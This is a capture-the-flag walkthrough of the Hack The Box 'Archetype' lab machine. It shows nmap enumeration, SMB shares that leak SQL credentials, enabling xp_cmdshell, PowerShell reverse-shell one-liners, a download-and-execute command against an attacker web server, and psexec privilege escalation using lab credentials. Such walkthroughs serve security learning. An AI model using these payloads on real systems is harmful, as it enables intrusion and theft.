Archetype Walkthrough

Here I will begin with the path of "Starting Point". Basically it’s a series of 9 machines rated easy that should be rooted in a sequence.

They will provide official walkthroughs for each 9 machines. As I think it will be very helpfull for noob to understand the platform, techniques and more about HTB. And when it comes to noob, no one is here to find just zero-day vulnerabilities. So from my perspective, it's fine to read each and every walkthroughs provided by HTB and others to understand by yourself. "Walkthroughs are the teachers".

Enough talks 🥱, let's start to hack. 🐱‍💻

Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱‍👤

00. Start Machine …

To start machine, Just click "Join Machine".

Then you can see the IP address for that machine. usually it is 10.10.10.27 🤠

Before going to enumeration steps we can simply ping to the IP address and check our VPN connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

root in ~/Documents/HackThebox/Archetype
⚡❯ ping 10.10.10.27 -c 2
PING 10.10.10.27 (10.10.10.27) 56(84) bytes of data.
64 bytes from 10.10.10.27: icmp_seq=1 ttl=127 time=252 ms
64 bytes from 10.10.10.27: icmp_seq=2 ttl=127 time=251 ms

--- 10.10.10.27 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 250.934/251.550/252.167/0.616 ms

01. Enumeration First …

01.1 Fast ports scan

nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.27
-n	: Never do DNS resolution
-vv	: Extra verbosity
--open	: Output only open ports
-p-	: Full TCP ports range (65535)
-T4	: Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network

Here is the output 👇

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2 
⚡❯ nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.27
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 19:15 +0530
Initiating Ping Scan at 19:15
Scanning 10.10.10.27 [4 ports]
Completed Ping Scan at 19:15, 0.27s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:15
Scanning 10.10.10.27 [65535 ports]
Discovered open port 139/tcp on 10.10.10.27
Discovered open port 445/tcp on 10.10.10.27
Discovered open port 135/tcp on 10.10.10.27
Discovered open port 49669/tcp on 10.10.10.27
SYN Stealth Scan Timing: About 7.87% done; ETC: 19:21 (0:06:03 remaining)
SYN Stealth Scan Timing: About 8.21% done; ETC: 19:27 (0:11:22 remaining)
Discovered open port 5985/tcp on 10.10.10.27
SYN Stealth Scan Timing: About 42.06% done; ETC: 19:18 (0:02:05 remaining)
Discovered open port 47001/tcp on 10.10.10.27
Discovered open port 49666/tcp on 10.10.10.27
SYN Stealth Scan Timing: About 64.67% done; ETC: 19:18 (0:01:06 remaining)
Discovered open port 49667/tcp on 10.10.10.27
Discovered open port 1433/tcp on 10.10.10.27
Discovered open port 49665/tcp on 10.10.10.27
Discovered open port 49664/tcp on 10.10.10.27
Discovered open port 49668/tcp on 10.10.10.27
Completed SYN Stealth Scan at 19:17, 172.44s elapsed (65535 total ports)
Nmap scan report for 10.10.10.27
Host is up, received echo-reply ttl 127 (0.67s latency).
Scanned at 2021-04-15 19:15:06 +0530 for 173s
Not shown: 65523 closed ports
Reason: 65523 resets
PORT      STATE SERVICE      REASON
135/tcp   open  msrpc        syn-ack ttl 127
139/tcp   open  netbios-ssn  syn-ack ttl 127
445/tcp   open  microsoft-ds syn-ack ttl 127
1433/tcp  open  ms-sql-s     syn-ack ttl 127
5985/tcp  open  wsman        syn-ack ttl 127
47001/tcp open  winrm        syn-ack ttl 127
49664/tcp open  unknown      syn-ack ttl 127
49665/tcp open  unknown      syn-ack ttl 127
49666/tcp open  unknown      syn-ack ttl 127
49667/tcp open  unknown      syn-ack ttl 127
49668/tcp open  unknown      syn-ack ttl 127
49669/tcp open  unknown      syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 172.86 seconds
           Raw packets sent: 102404 (4.506MB) | Rcvd: 93270 (3.731MB)

I have some tricky bash script to get all open ports as bash variable call "ports". Somehow it will be helpful later. 😎 

ports=$(cat AllPorts.nmap | grep ^\[0-9\] | cut -d '/' -f 1 | tr '\\n' ',' | sed s/,$//)

Yes, we can simply combine those two lines into one. But I need to see results quickly. That's why I divide it into two parts. If you want it in one line, you can use

ports=$(nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)"

Here is the output 👇

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2  took 2m52s
⚡❯ more AllPorts.nmap
# Nmap 7.91 scan initiated Thu Apr 15 19:15:06 2021 as: nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.27
Nmap scan report for 10.10.10.27
Host is up, received echo-reply ttl 127 (0.67s latency).
Scanned at 2021-04-15 19:15:06 +0530 for 173s
Not shown: 65523 closed ports
Reason: 65523 resets
PORT      STATE SERVICE      REASON
135/tcp   open  msrpc        syn-ack ttl 127 * (Interesting)
139/tcp   open  netbios-ssn  syn-ack ttl 127 * (Interesting)
445/tcp   open  microsoft-ds syn-ack ttl 127 * (Interesting)
1433/tcp  open  ms-sql-s     syn-ack ttl 127 * (Interesting)
5985/tcp  open  wsman        syn-ack ttl 127 * (Interesting)
47001/tcp open  winrm        syn-ack ttl 127 * (Interesting)
49664/tcp open  unknown      syn-ack ttl 127
49665/tcp open  unknown      syn-ack ttl 127
49666/tcp open  unknown      syn-ack ttl 127
49667/tcp open  unknown      syn-ack ttl 127
49668/tcp open  unknown      syn-ack ttl 127
49669/tcp open  unknown      syn-ack ttl 127

Here we can see some * (Interesting) ports. others can be avoid.

01.2 Run Nmap Scripting Engine

To get the best result we can run the Nmap Scripting Engine for all open ports. Now we know all open ports so that we can point out and run the script engine as fast as possible.

nmap -sV -sC -oN DetailPorts.nmap -p$ports 10.10.10.27 
-sV	: Service fingerprinting
-sC	: Launch default NSE nmap scripts

Most of the case this will be end up an error because of $ports variable. This is not the right time to fix it so if you get any error, run the command without $ports variable and point out all ports.

nmap -sV -sC -oN DetailPorts.nmap -p 135,139,455,1433 10.10.10.27

Here is the output 👇

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ nmap -sV -sC -oN DetailPorts.nmap -p 135,139,455,1433 10.10.10.27
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 19:38 +0530
Nmap scan report for 10.10.10.27
Host is up (0.52s latency).

PORT     STATE  SERVICE        VERSION
135/tcp  open   msrpc          Microsoft Windows RPC
139/tcp  open   netbios-ssn    Microsoft Windows netbios-ssn
455/tcp  closed creativepartnr
1433/tcp open   ms-sql-s       Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-04-15T14:30:06
|_Not valid after:  2051-04-15T14:30:06
|_ssl-date: 2021-04-15T14:30:34+00:00; +21m39s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 21m39s, deviation: 0s, median: 21m38s
| ms-sql-info:
|   10.10.10.27:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-time: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.24 seconds

Now we know the OS is Windows (Microsoft SQL Server 2017 RTM) and it has SMB (1433) port open. And lets enumerate further. Remember enumerating is the key! 🔑

01.3 List all available shares

So here it has smb (1433) port open. I used smbclient to list out all the available shares as anonymous user.

sudo smbclient -N -L 10.10.10.27
-N	: Don't ask for a password
-L	: Get a list of shares available on a host

Here is output 👇

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ sudo smbclient -N -L 10.10.10.27

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backups         Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

Here we got something very interesting right? There is only single share ‘backups’ accessible with no passwords. so let's try to access it and see what's inside.😎😋

smbclient -N \\\\10.10.10.27\\backups\\

So now we are done with SMB shell and there is a file called ‘prod.dtsConfig'. so let's download it.

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ smbclient -N \\\\10.10.10.27\\backups\\
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 20 17:50:57 2020
  ..                                  D        0  Mon Jan 20 17:50:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 17:53:02 2020

                10328063 blocks of size 4096. 8203982 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \>
smb: \> dir	: List all directories
smb: \> get	<file-name> : Download file

Now we can open prod.dtsConfig file and yeah that ‘prod.dtsConfig’ file contains a SQL connection string, containing credentials for the local Windows user ARCHETYPE\sql_svc 🥂.

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2  took 5m55s
⚡❯ more prod.dtsConfig
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

02. Lets get Foothold !!

Now we have credentials, Let's try connecting to the SQL Server using Impacket's mssqlclient.py

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

source : https://github.com/SecureAuthCorp/impacket

02.1 Download and use mssqlclient.py

First we need to simply wget and download the mssqlclient.py script. 

 wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/mssqlclient.py

And then run the script and check whether we are working as a sysadmin (privileged user) or not.

python3 mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27 -windows-auth

Now we can use the IS_SRVROLEMEMBER function to check whether the current SQL user has sysadmin (highest level) privileges on the SQL Server.

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ python3 mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27 -windows-auth
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> SELECT IS_SRVROLEMEMBER ('sysadmin')


-----------

          1

SQL>

According to the return value (1 = login is a member of role.) yes we have highest privileges.😁 This will allow us to enable xp_cmdshell and gain RCE on the host.

Check below awesome blog posts to understand that trick.

02.2 Usage of xp_cmdshell

To get xp_cmdshell, type below commands. 

EXEC sp_configure 'Show Advanced Options', 1; 
reconfigure; 
sp_configure; 
EXEC sp_configure 'xp_cmdshell', 1 
reconfigure; 
xp_cmdshell "whoami"

The whoami command output trigger that the SQL Server is also running in the context of the user ARCHETYPE\sql_svc.

SQL> xp_cmdshell "whoami"
output

--------------------------------------------------------------------------------

archetype\sql_svc

NULL

However, Now we can run system commands using xp_cmdshell. why can't we get proper shell. 🤠

Hmmmmah !! what a nice smell for powershell reverse-shell huh! 😍

You can get some idea about reverse shells from below links,

But personally, I like to use Nishang's Invoke-PowerShellTcpOneLine.ps1 to create my rev-shell.

After deleting all comments and unwanted things, powershell script will be like this. 👇

$client = New-Object System.Net.Sockets.TCPClient('YourIP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

$sm=(New-Object Net.Sockets.TCPClient('YourIP',4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Remember: Type ifconfig tun0 and replace YourIP

02.3 Get Reverse Shell

Now time to get reverse shell. Save above powershell script as anyname.ps1 (here I use script.ps1) and power up mini webserver. I'm a very lasy man you know 🙄 so here I use updog instead of typing long shit in python 😑

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use HTTP basic auth.

source : https://github.com/sc0tfree/updog

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ updog
[+] Serving /root/Documents/HackThebox/Archetype...
 * Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)

To listen the connection, I always use the swiss army knife (netcat) tool. personally I do not like to get shell through multi handler (metasploit). Trust me, using netcat tool you can learn a lot of things beyond metaspolit. 👽

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ nc -lvnp 4444
 listening on [any] 4444 ...

03. Exploit the target …

Now we can issue the command to download and execute the reverse shell through xp_cmdshell.

EXEC xp_cmdshell 'echo IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.39:9090/script.ps1") | powershell -noprofile'

I divided up my terminal up to 3 parts using Tmux multiplexer.

Woooh!!! We got our shell. 💀 A shell is received as sql_svc, and we can get the user.txt on their desktop.

04. Privilege Escalation …

To escalate privileges we can run different tools. By the way, before run any tool there are some steps that you need to run to enumerate some information. I will be showing you one by one in each walkthroughs.

Did you remember? now we are in service account called sql_svc. It's good practice to check recently accessed files/executed commands (Keep in mind as good practice). Mostly (default) our console history will be saved in C:\Users\<account_name>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt . Now you understand what our next step is.

Right, Let's check above file using type command. 

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Here is the output 👇

PS C:\Users\Administrator> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
PS C:\Users\Administrator>

Oh no no no noooo.. You see?

The backup share is mapped with admin credentials. Remember if you saw something like this. ready to launch Impacket's psexec.py script.

python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:MEGACORP_4dm1n\!\!@10.10.10.27

Here is the output 👇

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:MEGACORP_4dm1n\!\!@10.10.10.27
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file gZiCFMKg.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service FuWR on 10.10.10.27.....
[*] Starting service FuWR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

Finally we have Administrator Privileges. 👌 Now we can access the flag on the administrator desktop.

Find me on @twitter

PreviousTable of contentsNextOopsie Walkthrough

Last updated